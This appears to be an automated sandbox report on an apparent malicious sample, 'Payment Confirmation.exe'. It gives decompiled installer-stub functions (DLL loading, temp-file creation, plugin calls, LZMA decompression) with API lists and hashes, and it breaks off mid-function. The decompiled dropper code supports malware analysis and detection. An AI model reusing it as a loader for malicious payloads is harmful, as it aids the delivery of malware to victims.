                                                  • Opcode ID: dd089d872932a23d2630cd1ccd3fcb4088d996f6ba4dda5dbfba8ad58673e668
                                                  • Instruction ID: d427f4d8d242f0867129329f34c080c8e463f615e2da75b7b71e3ac122bbbf3d
                                                  • Opcode Fuzzy Hash: dd089d872932a23d2630cd1ccd3fcb4088d996f6ba4dda5dbfba8ad58673e668
                                                  • Instruction Fuzzy Hash: 3FA1C175E04109EFDB50DFA8C985BADBBF5EF08345F2084A5E915EB291E730EA81DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                  0x00405ed1
                                                  0x00405eda
                                                  0x00405edc
                                                  0x00405edc
                                                  0x00405ee0
                                                  0x00405ef2
                                                  0x00405eec
                                                  0x00405eec
                                                  0x00405eec
                                                  0x00405ef6
                                                  0x00405f0a
                                                  0x00405f1e
                                                  0x00405f25

                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                  • wsprintfA.USER32 ref: 00405F0A
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                  0x004058a2
                                                  0x004058a8
                                                  0x004058a9
                                                  0x004058a9
                                                  0x004058aa
                                                  0x004058b1
                                                  0x004058bb
                                                  0x004058c8
                                                  0x004058cb
                                                  0x004058d3
                                                  0x00000000
                                                  0x00000000
                                                  0x004058d7
                                                  0x00000000
                                                  0x00000000
                                                  0x004058d9
                                                  0x00000000
                                                  0x004058d9
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004058B1
                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3180253843
                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A7DD, Relevance: 7.7, APIs: 5, Instructions: 192fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A990
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 7cca545604d689d08728aeb6c41d03de25dbe69bb4e556d92d753d7e76485d20
                                                  • Instruction ID: 30350b3b9754a49e5620a30c04d1a8e2bffc45e3def4b3ef8318ccbd4eaa8570
                                                  • Opcode Fuzzy Hash: 7cca545604d689d08728aeb6c41d03de25dbe69bb4e556d92d753d7e76485d20
                                                  • Instruction Fuzzy Hash: 88710839E54348AADB50CBE4E956BEDB7B5EF48710F208416F608EE2E0E7705E81DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                  0x00401f84
                                                  0x00401f84
                                                  0x00401f89
                                                  0x00401f90
                                                  0x0040204c
                                                  0x00402197
                                                  0x00402197
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028cd
                                                  0x004028cd
                                                  0x00401f9f
                                                  0x00401fa9
                                                  0x00401fac
                                                  0x00401fbb
                                                  0x00401fbf
                                                  0x00401fc5
                                                  0x00401fc9
                                                  0x00402045
                                                  0x00000000
                                                  0x00402045
                                                  0x00401fcb
                                                  0x00401fd5
                                                  0x00401fd9
                                                  0x0040201d
                                                  0x00401fdb
                                                  0x00401fde
                                                  0x00401fe1
                                                  0x00402011
                                                  0x00401fe3
                                                  0x00401fe6
                                                  0x00401fef
                                                  0x00401ff1
                                                  0x00401ff1
                                                  0x00401fef
                                                  0x00401fe1
                                                  0x00402025
                                                  0x0040203a
                                                  0x0040203a
                                                  0x00000000
                                                  0x00402025
                                                  0x00401faf
                                                  0x00401fb5
                                                  0x00401fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                  • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                  • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                  • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                  0x004015b3
                                                  0x004015ba
                                                  0x004015bd
                                                  0x004015c2
                                                  0x004015c6
                                                  0x004015c8
                                                  0x004015d0
                                                  0x004015d2
                                                  0x004015d4
                                                  0x004015d8
                                                  0x004015db
                                                  0x004015f3
                                                  0x004015f4
                                                  0x004015dd
                                                  0x004015dd
                                                  0x004015e0
                                                  0x00000000
                                                  0x004015eb
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015e0
                                                  0x004015fb
                                                  0x00401602
                                                  0x0040160f
                                                  0x0040160f
                                                  0x00401604
                                                  0x00401605
                                                  0x0040160d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040160d
                                                  0x00401602
                                                  0x00401612
                                                  0x00401615
                                                  0x00401617
                                                  0x00401618
                                                  0x004015c8
                                                  0x0040161f
                                                  0x0040164a
                                                  0x00402197
                                                  0x00401621
                                                  0x00401623
                                                  0x0040162e
                                                  0x00401634
                                                  0x0040163c
                                                  0x00401642
                                                  0x00401642
                                                  0x0040163c
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                    • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1892508949-1104044542
                                                  • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                  • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                  • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                  • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
